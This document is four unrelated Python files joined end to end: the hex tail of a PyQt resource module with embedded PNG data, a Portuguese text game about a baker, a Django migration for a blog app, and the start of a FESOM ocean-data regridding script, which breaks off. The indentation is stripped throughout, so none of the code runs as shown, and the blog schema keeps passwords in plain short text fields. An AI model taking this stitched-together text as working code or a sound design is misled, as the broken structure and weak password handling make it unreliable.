\x29\xbd\xe8\x91\xe6\x23\x3d\x85\xd4\xbb\x44\x31\x96\xa9\x99\xcd\
\x8a\xf1\x95\x94\x3b\x52\xee\x9e\x31\xbb\xd8\x8c\x97\x80\xc6\x5c\
\x68\xac\xa3\x35\xdf\x6e\xde\x5e\xc0\xf4\x27\xc1\x58\xdc\x17\xac\
\x73\x1c\x00\x45\xb0\x6e\x69\xe4\x8f\xc1\xc2\x72\xfa\x23\x82\x1d\
\x1a\x39\x05\x28\xc5\x01\x5e\x21\xec\xbd\x15\xe3\xb1\x77\xf1\x2c\
\x0a\x63\xd4\x00\x87\x46\x3b\x1e\x6c\x34\x7c\xeb\xc7\xf5\xaf\x4f\
\xed\xd3\xa8\x79\x9d\x18\x93\x70\xd7\x1d\x83\xdd\x83\xa0\xc0\x24\
\xb6\x6e\x31\x01\x6e\xc6\x04\x92\x38\x82\xcb\x5c\x08\x66\x14\xd6\
\x16\x51\x5b\xbe\x8d\x72\x32\xd8\x88\x97\x29\x40\xbf\xba\x7d\x98\
\x0d\x09\x10\x6f\x05\x8e\x02\x9e\x10\xc4\x60\x67\xa9\x9d\xfd\xaf\
\xde\x0d\xe6\x4a\x0f\x58\x3d\x1d\x90\x95\x13\x9b\xf6\x2d\x1f\xbd\
\x15\xe4\x88\xdf\x2e\xa0\x15\x38\x0b\x1c\x2f\x82\xd0\x5c\xa0\xf0\
\x57\x60\x9d\xcd\x63\x1a\x0a\xcb\x06\xd0\x50\x01\x91\x81\x40\xce\
\x61\xe7\x39\xb9\xd0\x39\xc8\xc6\x6e\x04\xc0\xc0\xcd\x69\x3b\x68\
\xe5\x00\x47\x52\x69\x89\x5e\x4e\x10\x48\x21\x88\xcb\x58\x08\xbe\
\x00\x6c\x01\xf6\x3e\x41\x2d\xb9\x44\xf1\x60\x81\x9d\x11\x93\xca\
\x31\xb7\xba\xe1\x82\x9f\x81\x02\x03\xa2\x99\x30\x14\x0e\xa4\xc0\
\x13\xc7\x21\x7b\x01\x70\x36\xcb\x09\x43\x89\xc4\x1f\x28\x63\xe1\
\x0a\x9b\xc9\x32\x9d\x30\xd5\xd5\xe9\x91\x46\xe0\xc4\x18\xd0\x83\
\x16\x78\xea\x1c\x21\x1c\x04\xa1\xfb\xc8\x9e\x9f\x41\x4d\x1e\xc4\
\x5e\x39\xee\xa4\xc2\x5c\xb0\xfa\x40\xb5\xcb\xce\x57\xb6\x94\xdb\
\x91\x36\x06\xd6\xc2\x4b\x39\xa1\x1c\x2a\x00\x11\x81\x0b\xde\x82\
\xad\x49\xc4\xbf\x7c\x93\x0e\x6e\x64\x37\x06\xb5\x18\x40\x9c\xae\
\xfc\x06\xe1\x2d\x98\x3b\x3c\x50\xb2\x1a\x88\x09\x12\x5a\x38\x36\
\x0b\xfa\x06\xa0\xe7\x5c\xe7\xc6\xa6\x3d\x13\xcc\x3f\x61\xc6\x87\
\xbc\x30\x3f\x42\xa6\x63\x2e\x52\x9d\x1b\x9b\x06\x87\xb5\xf2\x1d\
\xf2\x39\x3b\x1b\x98\x71\x04\xdb\x17\xec\x06\x7a\x90\xba\x60\x22\
\x5d\x57\x83\x31\x59\x90\xfe\x81\x8d\x41\x2b\x1b\xfe\xf4\xdb\x4d\
\x4e\x93\xc3\x8b\x95\x50\x0b\x66\xe7\x20\xba\x63\x51\x08\x98\xb9\
\x0f\xc3\x40\x37\xd6\xca\x77\xe8\xe0\x16\xc2\x24\x72\x35\x01\x7a\
\x02\x73\xdc\xaf\xe2\x4e\x9a\x00\xd9\x41\x38\xf8\x2b\xd2\x30\xa4\
\x41\x48\x2f\xdb\x01\xa9\x7d\x09\xd2\x40\xaf\xe4\x2a\x92\xe8\xa7\
\xce\xfb\x0d\xbd\x1e\x43\xcb\x85\x2a\xcb\x50\xe0\x15\x14\x7e\xd3\
\xd0\xd7\x16\xfa\xde\x42\x91\xcf\x91\x35\x07\x35\x6f\x40\xe5\x42\
\x2d\x9d\xc8\x7a\xd0\x70\x02\xd8\x42\x89\xb7\xa5\x82\x0b\x14\xd9\
\x87\x34\x0b\x89\xc5\xf6\x08\xe1\xda\x22\xbb\xb1\x79\x59\xe2\x4f\
\xc9\x7b\x8b\xf4\x3c\xb2\x78\x4d\x47\x88\xab\x95\x93\xd2\x2d\x48\
\x09\x97\xc9\xa2\x5a\xe2\xa8\xe2\x74\xd8\x73\x94\x84\x71\xd2\x84\
\x54\x29\xad\x44\x1a\x93\x22\x1a\xd7\x20\x8d\xb0\x67\x22\x95\xb5\
\xa8\x7a\x1f\x52\xae\xcb\x59\xc4\x20\xb5\x5d\xe3\xd5\x8f\xad\x68\
\x6f\x33\x0a\xbf\x66\x48\x05\xc9\x12\x57\x4a\xfe\x21\xaa\x2c\x47\
\x3b\x9a\x91\x8a\x0d\xc9\xb8\x44\x72\x4f\x53\xec\xfe\x02\x55\x34\
\x22\xeb\x30\xd2\xa4\x44\xc9\x78\xca\x19\xf6\xcc\x97\x86\x95\x48\
\xfb\x90\x0a\xa6\x48\xfc\x20\x79\x2f\x96\x16\xe3\x4c\xbc\xbe\x92\
\xce\x19\x2e\xcd\xec\xa9\x38\x47\xd5\x4e\x4c\x56\xef\xbb\xa4\xe1\
\xdd\x24\xbe\x51\x05\x71\xd5\x10\x57\x98\xbd\xd2\xe8\x3e\xd2\xb9\
\x1e\x69\x58\x9a\x94\xf0\x90\x4e\x25\xaf\x11\x81\xa9\xd9\xd2\x3f\
\x3c\x6a\x6d\x41\x3f\xcb\xa1\xd0\xc4\x04\xc9\x3f\x48\xb1\xaf\xd0\
\x1c\xa1\xc6\xdf\x4c\xa9\xb7\x47\xa2\x54\xe2\x42\x89\xfb\xa4\xa4\
\x73\xb4\xa6\x02\xad\x6e\x41\xea\xe6\x93\xb8\xd5\x99\x0d\xfe\x4b\
\xea\x31\x5c\xf1\x5f\x91\x75\x10\xe9\xbc\x14\x27\xc6\xbe\x69\x9f\
\xc4\x7d\x49\xd2\x55\x99\x4e\xbc\x9d\x2a\x3d\x89\xc4\x74\x89\xf7\
\xa5\x31\xbd\xa5\xae\x97\x49\xac\x52\x88\x36\xa9\x47\x81\xfd\x3a\
\x35\x8a\x52\x27\xb1\x5c\x16\x6f\x48\x4f\xa1\x78\xca\x75\x6a\x4a\
\x78\x49\x35\x74\x68\x8e\x4b\x42\x59\x3e\x59\xef\xa1\xda\x00\x8a\
\x4f\x4f\x96\x28\x96\xae\x40\xc1\xfd\xf6\x04\x2a\xb0\x14\xc9\x3f\
\xde\x59\xe8\x34\x89\x4b\xa4\x94\x6e\xaa\x5d\x6a\xea\x45\xa1\x2f\
\x2c\x64\x6d\x41\x2a\xcd\x75\xf4\xe3\x11\x89\xd5\x92\xeb\x7d\xe9\
\xd2\x54\xe9\x17\xa4\x61\x45\x12\x1f\x4a\x54\x2a\xc6\x46\x29\x6d\
\x8c\xc4\x9b\xb2\x58\x2b\xa5\xa7\x39\x8b\x3d\x29\x75\x4f\x56\x94\
\xb5\x3a\x4c\x4c\x01\x0e\x4a\xc6\x33\x8a\xd2\xa4\x38\x01\x1d\x24\
\xa6\xf6\xb1\xcb\xa4\xf3\x5d\x8a\xe6\x4e\x51\x1d\x3f\xeb\x3b\xa4\
\xd5\xc4\xf4\x11\x12\xf1\xcf\x91\x1e\x47\x9a\x99\x2d\xe5\xf8\xa5\
\x2b\x4c\xe9\x5b\x54\x17\x45\xd6\x03\x6e\xc9\xdf\x5d\xe2\x5c\x7b\
\x66\xe8\xc9\x97\xae\x34\xf4\xe9\x09\x7b\x28\xba\x4a\x68\xb1\xd0\
\xd9\x16\xd4\xbc\x1d\xe9\x2a\xbf\xc4\x15\x12\xf3\xd5\x4a\xab\x2c\
\x8e\x4b\xb9\x23\xa5\x67\x90\xae\x2a\x94\x58\xa9\x06\xa4\x20\x4b\
\xed\xcb\x0b\xf6\x4a\xbc\xab\x38\xfb\x55\x81\x65\x4f\x79\xf9\x46\
\xed\x04\x74\x9a\x6a\x1d\x24\xa4\xad\x48\x11\x3a\x15\x34\x7f\x94\
\xdc\x53\x15\x49\xdd\xab\x36\xef\xef\xfa\xa2\xf0\xa0\x16\x76\x3d\
\xa2\x08\xeb\x74\x77\x9e\xe4\x9a\xdb\x9f\x79\xc6\xda\x14\xd8\x38\
\x19\x92\x8f\xc1\xe8\x30\xd1\x2b\x0d\x52\x9e\xea\x86\xf1\x45\x02\
\x14\x89\xc8\x05\x89\x54\xbd\xb8\x8f\xa5\x8f\x07\xf8\xfc\x21\xe1\
\xca\xb0\xc5\x32\xd9\x21\xcd\xfa\x20\x44\x4a\x81\x1b\xa2\xf8\x87\
\x9f\x80\xd0\x16\x12\x2a\x4f\x41\xd4\x87\xd1\x31\x02\xca\x2c\x22\
\xb3\x77\x11\x9d\xba\x12\xef\xba\x18\x66\x74\x24\xee\x3e\x9f\x41\
\x53\x00\xb8\x80\x28\x25\xf8\x68\xc6\x4b\x39\x71\xd2\x30\xc8\xe6\
\x77\xba\x10\x26\xca\x20\x76\xe1\x3f\x6f\x01\xee\xd0\x49\xde\xf0\
\xcd\x23\xd2\x69\xb1\xc2\x5f\xcc\x65\x9d\xd5\x84\x5b\x45\xa3\xbf\
\x81\x98\x75\x02\xde\xdf\x79\x95\x46\x6d\x7b\x4f\xd7\x1c\x9a\xad\
\xc0\x2f\x48\x2f\x21\x8d\xf4\x48\x5d\x8b\xa4\x3b\x0d\x35\x1c\xb2\
\x73\xfa\x1b\x16\xda\xd8\x89\x82\xb5\xa8\xea\x18\x7a\xc1\x42\xcf\
\x0b\xad\x13\xfa\x3d\x8c\xe2\x9b\x0d\x75\x9c\x34\xa4\xa3\xc8\x6a\
\xb4\x19\x50\x05\xdd\x25\x63\x92\xc4\x08\x89\x19\xd2\xf8\x02\xe9\
\xff\x21\x79\xee\x90\x8c\xcf\x25\xe3\x4a\xbb\x7f\x8c\x6a\xc9\x78\
\x47\x32\x26\x48\xac\x90\xd8\xa7\xbd\x48\x11\x9e\x95\xd8\xa9\x72\
\xa2\xb2\x58\xa7\x36\x0e\x4a\x2c\xd7\x7a\xb3\x5c\xa1\xae\x77\xa9\
\xf9\xfa\xb1\xba\xb6\xfc\x2e\x69\xd0\x10\x19\x0d\x7c\xab\xe5\x13\
\x5d\xdc\x64\x3e\x40\xda\xaf\x03\xc0\xbf\x0e\xba\x75\xf2\xf5\xe7\
\xa2\xc7\x06\x38\x5a\x6b\x32\xfe\x50\x1a\x19\xd5\x51\x68\x4f\x83\
\x84\x28\xd4\xd6\xd1\xf9\x3c\x6c\x19\x0f\x7d\x2c\xe8\xfe\x0a\xb8\
\xde\x99\x02\x6d\x57\x41\xe6\x87\x90\xe1\x42\x97\x54\x41\x71\x19\
\x9d\x57\x99\xf8\xdf\x4b\x41\x8b\x2e\x27\x16\xbe\x06\x4f\xc6\x6b\
\xe0\xa9\x85\xba\xc7\x61\xf8\xbb\x70\x32\x8c\x96\xb5\x12\x49\x08\
\xe2\x5b\x1e\x82\x77\xee\x21\xce\x2d\x1c\xa2\x3b\x3d\x88\x62\xb2\
\x95\xdd\x5c\xc6\xf9\x9e\x8d\xec\x1b\xf8\x15\xc5\x5d\x8a\xd9\xfc\
\xfd\x97\x4c\xce\x3c\x97\xfd\xf7\x1f\xa7\xab\xd9\x40\xc3\x2b\xb7\
\x61\xac\xfc\x3d\x41\x57\x7f\xdf\xdd\x1e\xe6\xac\x05\x4a\x4c\xea\
\x17\x59\x64\xee\xcb\xc1\x35\x0f\x38\xde\x1d\x54\x04\xf4\x71\xc2\
\xcf\x20\x3b\x00\x4d\x3a\x49\xfd\xe7\x65\xac\x4f\x86\x1b\xde\x05\
\xe3\x89\x31\xc4\x9b\x5f\x76\xac\x6c\x22\x2e\x8e\x41\xff\x77\xed\
\xbc\x9f\x93\x83\x36\x8e\xc2\xe0\x12\x3a\xb8\x80\x24\xbe\xb0\x83\
\xd7\xcd\x4b\x09\x2f\x81\x76\x13\x52\x0c\xf0\xec\x01\xf3\x43\xe0\
\xb7\xf1\x54\xec\xfb\x37\xf9\xb1\x12\x02\x34\x93\xe9\xdf\x0d\xe6\
\xd7\x90\x60\xc1\xed\x2b\xa8\x5e\xf7\x22\x4b\x0a\x07\x91\x5b\xe6\
\xa1\x3c\x2d\xc6\x4b\x67\x42\xb8\xae\x6e\x7e\x73\x5e\x72\xaf\x6d\
\xa4\xbf\xdf\x1b\x7a\xf9\x61\xdb\x34\x92\x7e\x18\x86\xf9\x51\x09\
\x34\x8c\x04\xa6\xdb\x73\x0c\x8e\x42\xd1\x01\xc8\xfc\x9e\xc8\xa4\
\xa3\x54\x4e\x6f\x64\x76\x29\xdc\x0e\x64\xee\x04\xea\xea\x31\x6b\
\x4e\x60\x5a\x51\x4c\xd7\x6f\xa0\x6e\x50\x6f\x40\xdd\x5d\x58\xa7\
\xfb\x62\x5a\x3e\xc4\x4c\x0c\xd2\x70\xf1\x7f\xd0\x77\x33\x9c\x13\
\xc4\x5d\x0f\xfe\x3a\x70\x6f\x07\xe3\xb8\xe3\x6c\x7a\x54\x91\xbe\
\x25\x9b\x5d\x4c\x22\x89\x8d\x24\x45\x0b\x68\x8d\x9c\x8f\x72\xf7\
\xd1\xb2\xeb\x72\x9a\xae\xf6\xb0\x6a\xfd\x9d\x7c\xf8\xa4\xc1\x23\
\xef\x1c\xa4\xa5\x7d\x0a\xff\x1f\xa7\x48\xb3\x27\x67\x17\xe2\x1e\
\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
"
qt_resource_name = b"\
\x00\x05\
\x00\x73\x5e\x63\
\x00\x6c\
\x00\x6f\x00\x67\x00\x6f\x00\x73\
\x00\x08\
\x0a\x61\x5a\xa7\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\x00\x2e\x00\x70\x00\x6e\x00\x67\
"
qt_resource_struct_v1 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x10\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
"
qt_resource_struct_v2 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x10\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x74\x20\x97\x84\xbd\
"
qt_version = [int(v) for v in QtCore.qVersion().split('.')]
if qt_version < [5, 8, 0]:
rcc_version = 1
qt_resource_struct = qt_resource_struct_v1
else:
rcc_version = 2
qt_resource_struct = qt_resource_struct_v2
def qInitResources():
QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
|
"""Padeiro pobre precisa de ajuda para começar a ganhar dinheiro.
Ele precisa conseguir uma grana para comprar massas para produzir pão.
Com massa ele pode ir à padaria, fazer e vender pães.
Ele poderá pedir esmola na rua.
Pode pedir esmola para a mãe.
"""
from random import uniform
from random import randint
class Padeiro:
def __init__(self, nome, idade, dinheiro):
self.nome = nome
self.idade = idade
self.dinheiro = float(dinheiro)
self.massa = int(0)
self.exp = 1.0
self.repetir = True
def trabalhar(self):
x = 0
fabricar = input('\tQuantos pães deseja produzir?\n\t') # precisa fazer validação
try:
fabricar = int(fabricar)
if fabricar > self.massa:
print('\tVocê não tem massa suficiente para essa quantidade.')
elif fabricar == 0:
print('\tIsso é falta de profissionalismo, quando vier ao trabalho, traga tudo que for necessário.')
else:
self.massa -= fabricar
self.exp += uniform(0.2, 1)
while x < fabricar:
p = uniform(8.2, 9.6) + (self.exp / 5)
print('\t\tPão fabricado, vendido por R$ {:.2f}.'.format(p))
self.dinheiro += p
x += 1
except:
print('*Apenas números inteiros são válidos.')
self.menu()
def superm(self):
print('\tSeja bem-vindo ao Mercado de Massas.')
compra = input('\tNos informe quantas massas deseja comprar: ')
try:
compra = int(compra)
preco = compra * 10
if self.dinheiro < preco:
print('\nOps, você não tem dinheiro suficiente.\nCada uma custa R$ 10,00.')
elif compra == 0:
print('Volte sempre! Mas não me faça perder tempo!')
else:
self.massa += compra
self.dinheiro -= preco
print('Obrigado por sua compra, volte sempre!')
except:
print('*Apenas números inteiros são válidos.')
self.menu()
# def imprimir(self):
# print('O nome do padeiro é {}, ele tem {} anos de idade e começou com {} reais.'
# .format(self.nome,self.idade,self.dinheiro))
def imprimir_din(self):
print('{} está com R$ {:.2f}.'.format(self.nome, self.dinheiro))
self.menu()
def mae(self):
print('\nQue bom que veio me ver. É sempre muito gratificante receber um filho em casa.')
print('Posso te ajudar dando dicas de padaria. Caso eu tenha algumas moedas, posso te dar.')
esmola = uniform(0.05, 0.5)
aprend = randint(1, 16)
if aprend == 10 and self.dinheiro > 5:
assalto = uniform(0.3, 0.6)
sub = self.dinheiro * assalto
aprendizado = (aprend / 55) * uniform(1, 1.8)
self.dinheiro -= sub
print('Sua mãe está pobre! Tomou R$ {:.2f} de você!'.format(sub))
self.exp += aprendizado
print('Em compensação te ensinou muitas coisas.')
elif aprend == 5 or aprend == 6:
aprendizado = (aprend / 55) * uniform(1, 1.4)
self.dinheiro += esmola
self.exp += aprendizado
print('{} ganha R${:.2f}.'.format(self.nome, esmola))
print ('E ganha {:.2f} de experiência.'.format(aprendizado))
else:
self.dinheiro += esmola
print('{} ganha R${:.2f}.'.format(self.nome, esmola))
self.menu()
def esmola(self):
esmola = uniform(0.1, 2.5)
p_exp = uniform(0.01, 0.1)
sorte = randint(1,15)
if sorte == 10 and self.dinheiro > 5:
assalto = uniform(0.3, 0.5)
sub = self.dinheiro * assalto
self.dinheiro -= sub
print('Você foi assaltado! Levaram R$ {:.2f}.'.format(sub))
elif self.exp > 1:
self.dinheiro += esmola
self.exp -= p_exp
print('\nMe sinto desmotivado ao fazer isso, vou acabar perdendo minhas habilidades.')
print('{} passa o dia todo pedindo esmola e consegue R$ {:.2f} mas perde {:.2f} de experiência.'
.format(self.nome, esmola, p_exp))
else:
self.dinheiro += esmola
print('\nMe sinto desmotivado ao fazer isso, muito triste minha situação')
print('{} passa o dia todo pedindo esmola e consegue R$ {:.2f}.'.format(self.nome, esmola))
self.menu()
def menu(self):
print('\nSkill: {:.2f}, R$ {:.2f}, massas: {}.'.format(self.exp, self.dinheiro, self.massa))
print('\n\tAjude {} a tomar uma decisão.'
.format(self.nome))
print('\tAções:')
esc = int(input('\t\t1 - Ir ao trabalho.'
'\n\t\t2 - Ir ao supermercado.'
'\n\t\t3 - Ir à casa da mãe.'
'\n\t\t4 - Pedir esmola.'
'\n\t\t5 - Sair.\n'))
try:
esc = int(esc)
if esc == 1:
self.trabalhar()
elif esc == 2:
self.superm()
elif esc == 3:
self.mae()
elif esc == 4:
self.esmola()
elif esc == 5:
self.repetir = False
elif esc > 5:
print('*Escolha entre 1 e 5.')
except:
print('*Escolha entre 1 e 5.')
self.menu()
def home():
print()
print('\tOlá, nosso amigo padeiro precisa de ajuda. Que bom que você veio!.')
print('\tEle está desempregado e sem dinheiro, precisando de orientação.')
print('\tExiste uma forma de conseguir fazê-lo ganhar dinheiro. Encontre-a.')
input('\n\n\t Tecle "enter" para começar!')
produtos = ['bolo', 'pão', 'broa', 'rosca', 'bolachinha']
valores = [5, 0.10, 0.5, 6, 1]
prod = dict(zip(produtos, valores))
padeiro = Padeiro('Jucinaldo', 32, 0) # criando padeiro
while padeiro.repetir:
home()
padeiro.menu()
input('Tecle "enter" para fechar.')
|
# Generated by Django 2.2 on 2019-06-30 06:44
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Admin',
fields=[
('admin_id', models.BigAutoField(primary_key=True, serialize=False)),
('password', models.CharField(max_length=16)),
],
options={
'db_table': 'Admin',
},
),
migrations.CreateModel(
name='Blog',
fields=[
('blog_id', models.BigAutoField(primary_key=True, serialize=False)),
('content', models.TextField()),
('title', models.CharField(max_length=100)),
('view_num', models.IntegerField()),
('like_num', models.IntegerField()),
('create_time', models.DateTimeField()),
('modified_time', models.DateTimeField()),
],
options={
'db_table': 'Blog',
},
),
migrations.CreateModel(
name='Category',
fields=[
('cate_id', models.BigAutoField(primary_key=True, serialize=False)),
('cate_name', models.CharField(max_length=40)),
],
options={
'db_table': 'Category',
},
),
migrations.CreateModel(
name='Tag',
fields=[
('tag_id', models.BigAutoField(primary_key=True, serialize=False)),
('tag_name', models.CharField(max_length=40)),
],
options={
'db_table': 'Tag',
},
),
migrations.CreateModel(
name='User',
fields=[
('user_id', models.BigAutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=40)),
('nickname', models.CharField(max_length=40)),
('password', models.CharField(max_length=16)),
('regist_time', models.DateTimeField()),
('email', models.EmailField(blank=True, max_length=254, null=True)),
('description', models.CharField(blank=True, max_length=100, null=True)),
('image_height', models.PositiveIntegerField(blank=True, default='100', editable=False, null=True)),
('image_width', models.PositiveIntegerField(blank=True, default='100', editable=False, null=True)),
('avatar', models.ImageField(blank=True, height_field=models.PositiveIntegerField(blank=True, default='100', editable=False, null=True), null=True, upload_to='Img/avatar/', width_field=models.PositiveIntegerField(blank=True, default='100', editable=False, null=True))),
],
options={
'db_table': 'User',
},
),
migrations.CreateModel(
name='Notification',
fields=[
('noti_id', models.BigAutoField(primary_key=True, serialize=False)),
('content', models.CharField(max_length=400)),
('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogApp.User')),
],
options={
'db_table': 'Notification',
},
),
migrations.CreateModel(
name='Follow',
fields=[
('follow_id', models.BigAutoField(primary_key=True, serialize=False)),
('fld_user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='followers', to='blogApp.User')),
('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='follows', to='blogApp.User')),
],
options={
'db_table': 'Follow',
},
),
migrations.CreateModel(
name='Favourite',
fields=[
('favourite_id', models.BigAutoField(primary_key=True, serialize=False)),
('blog_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogApp.Blog')),
('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogApp.User')),
],
options={
'db_table': 'Favourite',
},
),
migrations.CreateModel(
name='Cookie',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('cookie', models.CharField(max_length=20)),
('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogApp.User')),
],
options={
'db_table': 'Cookie',
},
),
migrations.CreateModel(
name='Comment',
fields=[
('comment_id', models.BigAutoField(primary_key=True, serialize=False)),
('content', models.CharField(max_length=600)),
('time', models.DateTimeField()),
('blog_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogApp.Blog')),
('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogApp.User')),
],
options={
'db_table': 'Comment',
},
),
migrations.CreateModel(
name='BlogTag',
fields=[
('blog_tag_id', models.BigAutoField(primary_key=True, serialize=False)),
('blog_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogApp.Blog')),
('tag_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogApp.Tag')),
],
options={
'db_table': 'BlogTag',
},
),
migrations.AddField(
model_name='blog',
name='cate_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogApp.Category'),
),
migrations.AddField(
model_name='blog',
name='user_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogApp.User'),
),
migrations.RunSQL('alter table User auto_increment = 100000'),
migrations.RunSQL('alter table Admin auto_increment = 10000'),
]
|
# This file is part of fesom_viz
#
################################################################################
#
# Interpolates FESOM data to regular grid. The output is netCDF4 files
# with CMOR complient attributes.
#
# Original code by Nikolay Koldunov, 2016
#
# TODO:
# Add possibility to define curvilinear grid.
# Add ESMPy as regridding tool.
# Find official CMOR descriptions for some of the variables
# Modifications:
#
################################################################################
import sys
import ConfigParser
from netCDF4 import Dataset, num2date
import numpy as np
import json
from collections import OrderedDict
import os
import datetime
# Read configuration file
try:
config_file = sys.argv[1]
except:
print "You have to provide configuration file. Example config located in \"./configs/fesom2geo_example\""
sys.exit(1)
import multiprocessing as mp
config = ConfigParser.RawConfigParser()
config.read(config_file)
# There is an option to provide path to the pyfesom folder
pfpath = config.get('main', 'pfpath')
sys.path.append(pfpath)
import pyfesom as pf
# Read options from configuration file. See fesom2geo_example for
# explination and possible values
left_lon = config.getfloat('main', 'left_lon')
right_lon = config.getfloat('main', 'right_lon')
number_of_lons = config.getint('main', 'number_of_lons')
lower_lat = config.getfloat('main', 'lower_lat')
upper_lat = config.getfloat('main', 'upper_lat')
number_of_lats = config.getint('main', 'number_of_lats')
meshpath = config.get('main', 'meshpath')
path_to_data = config.get('main', 'path_to_data')
path_to_output = config.get('main', 'path_to_output')
zlib = config.getboolean('main', 'zlib')
radius_of_influence = config.getint('main', 'radius_of_influence')
k = config.getint('main', 'neighboring_points')
out_vars = config.get('main', 'out_vars').split(',')
out_vars = [w.strip() for w in out_vars]
print('='*50)
print("Variables that will be converted: {}".format(out_vars))
levels = np.asarray(config.get('main', 'levels').split(','), dtype='float')
angles_for_mesh = list(map(int,config.get('main','angles_for_mesh').split(',')))
angles_for_rotation = list(map(int,config.get('main','angles_for_rotation').split(',')))
start_year = config.getint('main','start_year')
end_year = config.getint('main','end_year')
ifile_template = config.get('main','ifile_template')
ifile_template_ice = config.get('main','ifile_template_ice')
ofile_template =config.get('main','ofile_template')
distribute_timesteps = config.getboolean('main', 'distribute_timesteps')
# Generate regular grid
lon = np.linspace(left_lon, right_lon, number_of_lons)
lat = np.linspace(lower_lat, upper_lat, number_of_lats)
lons, lats = np.meshgrid(lon,lat)
# read the FESOM mesh
print('='*50)
mesh = pf.load_mesh(meshpath,abg=angles_for_mesh, get3d=True, usepickle=True)
# Open CMOR variable descriptions
with open('CMIP6_Omon.json') as data_file:
cmore_table = json.load(data_file, object_pairs_hook=OrderedDict)
with open('CMIP6_SIday.json') as data_file:
cmore_table_ice = json.load(data_file, object_pairs_hook=OrderedDict)
# Add some variables that are missing in CMOR tables
cmore_table['variable_entry']['wo']= OrderedDict([(u'modeling_realm', u'ocean'),
(u'standard_name', u'sea_water_z_velocity'),
(u'units', u'm s-1'),
(u'cell_methods', u'time: mean'),
(u'cell_measures', u'--OPT'),
(u'long_name', u'Sea Water Z Velocity'),
(u'comment',
u'Not standard CMORE variable'),
(u'dimensions', u'longitude latitude olevel time'),
(u'out_name', u'wo'),
(u'type', u'real'),
(u'positive', u''),
(u'valid_min', u''),
(u'valid_max', u''),
(u'ok_min_mean_abs', u''),
(u'ok_max_mean_abs', u'')])
cmore_table['variable_entry']['wpot']= OrderedDict([(u'modeling_realm', u'ocean'),
(u'standard_name', u'sea_water_z_velocity'),
(u'units', u'm s-1'),
(u'cell_methods', u'time: mean'),
(u'cell_measures', u'--OPT'),
(u'long_name', u'Vertical Velocity Potential'),
(u'comment',
u'Not standard CMORE variable'),
(u'dimensions', u'longitude latitude olevel time'),
(u'out_name', u'wpot'),
(u'type', u'real'),
(u'positive', u''),
(u'valid_min', u''),
(u'valid_max', u''),
(u'ok_min_mean_abs', u''),
(u'ok_max_mean_abs', u'')])
cmore_table_ice['variable_entry']['esithick'] = OrderedDict([(u'modeling_realm', u'seaIce'),
(u'standard_name', u'effective_sea_ice_thickness'),
(u'units', u'm'),
(u'cell_methods', u'area: mean where sea_ice time: mean'),
(u'cell_measures', u'area: areacella'),
(u'long_name', u'Effective Sea-ice thickness'),
(u'comment',
u'Effective thickness of sea ice (volume divided by grid area as was done in CMIP5)'),
(u'dimensions', u'longitude latitude time'),
(u'out_name', u'esithick'),
(u'type', u''),
(u'positive', u''),
(u'valid_min', u''),
(u'valid_max', u''),
(u'ok_min_mean_abs', u''),
(u'ok_max_mean_abs', u'')])
#combine ocean and ice variables
cmore_table['variable_entry'].update(cmore_table_ice['variable_entry']) #
# Map FESOM variables to CMOR variables and provide some
# additional information for conversion
vardir = {}
vardir['temp'] = {}
vardir['temp']['dims'] = '3D'
vardir['temp']['cname'] = 'thetao'
vardir['salt'] = {}
vardir['salt']['dims'] = '3D'
vardir['salt']['cname'] = 'so'
vardir['u'] = {}
vardir['u']['dims'] = '3D'
vardir['u']['cname'] = 'uo'
vardir['u']['rotate_with'] = 'v'
vardir['v'] = {}
vardir['v']['dims'] = '3D'
vardir['v']['cname'] = 'vo'
vardir['v']['rotate_with'] = 'u'
vardir['w'] = {}
vardir['w']['dims'] = '3D'
vardir['w']['cname'] = 'wo'
vardir['wpot'] = {}
vardir['wpot']['dims'] = '3D'
vardir['wpot']['cname'] = 'wpot'
vardir['ssh'] = {}
vardir['ssh']['dims'] = '2D'
vardir['ssh']['cname'] = 'zos'
vardir['ssh']['realm'] = 'ocean'
vardir['area'] = {}
vardir['area']['dims'] = '2D'
vardir['area']['cname'] = 'siconc'
vardir['area']['realm'] = 'seaice'
vardir['hice'] = {}
vardir['hice']['dims'] = '2D'
vardir['hice']['cname'] = 'esithick'
vardir['hice']['realm'] = 'seaice'
vardir['uice'] = {}
vardir['uice']['dims'] = '2D'
vardir['uice']['cname'] = 'siu'
vardir['uice']['realm'] = 'seaice'
vardir['uice']['rotate_with'] = 'vice'
vardir['vice'] = {}
vardir['vice']['dims'] = '2D'
vardir['vice']['cname'] = 'siv'
vardir['vice']['realm'] = 'seaice'
